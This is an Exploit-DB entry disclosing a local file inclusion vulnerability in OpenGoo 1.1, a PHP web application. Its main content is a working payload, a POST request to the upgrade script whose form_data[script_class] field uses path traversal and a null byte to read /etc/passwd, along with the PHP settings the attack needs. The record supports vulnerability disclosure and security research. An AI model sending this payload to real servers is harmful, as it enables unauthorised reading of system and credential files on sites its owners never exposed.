OpenGoo 1.1 - Local File Inclusion

EDB-ID:

7863


Author:

fuzion

Type:

webapps


Platform:

PHP

Date:

2009-01-25


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

OpenGoo 1.1 Local File Inclusion
http://www.opengoo.org/

magic_quotes_gpc = Off
register_globals = On

http://site/opengoo/public/upgrade/index.php
POST: form_data[script_class]=/../../../../../../../../../../../etc/passwd%00.html

Author Notified: Jan. 18

http://nukeit.org

# milw0rm.com [2009-01-25]